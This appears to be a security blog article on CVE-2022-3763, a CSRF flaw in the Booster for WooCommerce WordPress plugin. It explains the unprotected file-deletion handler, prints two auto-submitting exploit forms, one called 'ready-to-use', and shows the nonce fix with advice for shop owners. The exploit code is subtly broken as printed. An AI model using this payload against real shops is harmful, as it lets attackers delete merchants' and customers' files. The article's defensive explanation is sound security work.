CVE CyberSecurity Database News

CVE-2022-3763 - Unveiling a CSRF Flaw in Booster for WooCommerce – Exploit Details, Impact & Fixes

Poster -

The Booster for WooCommerce is a popular WordPress plugin suite used by thousands of eCommerce businesses worldwide to enhance their WooCommerce shops with flexible features. However, in September 2022, a significant security vulnerability came to light: CVE-2022-3763. This CSRF (Cross-Site Request Forgery) vulnerability allowed malicious attackers to trick logged-in shop managers or administrators into deleting files uploaded at checkout—potentially harming business operations and damaging trust.

In this long-read, we’ll break down how the flaw works, review a simple exploit scenario, analyze the plugin’s code, and discuss what you can do to stay safe. We'll keep the language simple while diving deep into the technicals.

Booster Elite for WooCommerce (before 1.1.7)

Problem:  
When users upload files at the checkout (for things like custom order requests or documentation), the backend has a feature allowing shop managers/admins to delete those files. But—there was no CSRF check when making a deletion request. That means a malicious website could craft a special link or form that, if visited by a logged-in administrative user, would call this deletion endpoint and remove files—without permission.

Exploit Scenario: How an Attacker Can Delete Your Shop Files

Imagine you’re a shop manager, and while logged into your WooCommerce WordPress dashboard, you happen to visit a malicious website or click a link in a phishing email.

That website might silently submit the following HTML form in the background

<form action="https://yourshop.com/wp-admin/admin-ajax.php"; method="POST">
  <input type="hidden" name="action" value="wcj_order_delete_upload_file">
  <input type="hidden" name="wcj_delete_upload_file" value="path_to_the_target_file">
  <input type="submit">
</form>
<script>
  document.forms[].submit();
</script>

If you’re logged in and allowed to delete files (as manager or admin), the browser automatically includes your session cookie and security credentials—but because there’s no CSRF check (like a WordPress nonce), the plugin treats this POST request as legitimate. The specified file is deleted, and you—the victim—never even notice.

Looking at the Vulnerable Code

Below is a simplified PHP code snippet (representing what happens inside the affected plugin) to show how CSRF was missed:

// A simplified version of the file deletion handler in Booster for WooCommerce

add_action( 'wp_ajax_wcj_order_delete_upload_file', 'wcj_order_delete_upload_file_callback' );

function wcj_order_delete_upload_file_callback() {
    // No nonce/CSRF check done here
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Not allowed' );
    }
    $file_path = isset( $_POST['wcj_delete_upload_file'] ) ? $_POST['wcj_delete_upload_file'] : '';
    if ( $file_path && file_exists( $file_path ) ) {
        unlink( $file_path );
    }
    // Redirect or print status
    exit;
}

What’s missing?
No verification of a WordPress nonce, which is the standard way to defend against CSRF.

References

- Original Plugin Vulnerability Report (WPScan)
- Patch Release Notes (Booster for WooCommerce)
- Common WordPress Nonce Protection Doc

Here’s a ready-to-use CSRF exploit (for demonstration/testing on your own site only!)

<!-- Save this as csrf-delete.html and change the URLs/paths accordingly -->
<form action="https://vulnerable-shop.com/wp-admin/admin-ajax.php"; method="POST">
  <input type="hidden" name="action" value="wcj_order_delete_upload_file">
  <input type="hidden" name="wcj_delete_upload_file" value="/var/www/wp-content/uploads/woo_uploads/order123/userdoc.pdf">
  <input type="submit">
</form>
<script>
  document.forms[].submit();
</script>

If a logged-in manager/admin visits this page, /var/www/wp-content/uploads/woo_uploads/order123/userdoc.pdf is deleted.

Booster Elite for WooCommerce 1.1.7

How did they fix it?

They added CSRF checks using nonces. Here’s a simplified fixed handler

function wcj_order_delete_upload_file_callback() {
    if ( ! isset( $_POST['_wpnonce'] ) || ! wp_verify_nonce( $_POST['_wpnonce'], 'wcj_order_delete_upload_file' ) ) {
        wp_die( 'Security check failed' );
    }
    // ...rest of code as before
}

Review logs: Look for unexpected file deletions in your WooCommerce orders.

- Educate staff: Remind staff not to click unknown links or visit unknown sites while logged in as admin.
- Check other plugins: CSRF bugs like this are common—regularly review and update all extensions.

Key Takeaways

- CVE-2022-3763 is a classic example of the dangers of missing CSRF protection in WordPress AJAX handlers.

Keeping your plugins up to date is crucial for WooCommerce shop security.

- Use developer tools like WPScan to stay up to date on plugin vulnerabilities.


If you run a WooCommerce store, stay vigilant, keep everything patched, and know that your website’s security is only as strong as its weakest plugin.

*For more in-depth security analysis and updates, follow credible sources like Patchstack Blog, WPScan, and Booster official website.*

Timeline

Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 16:53:00 UTC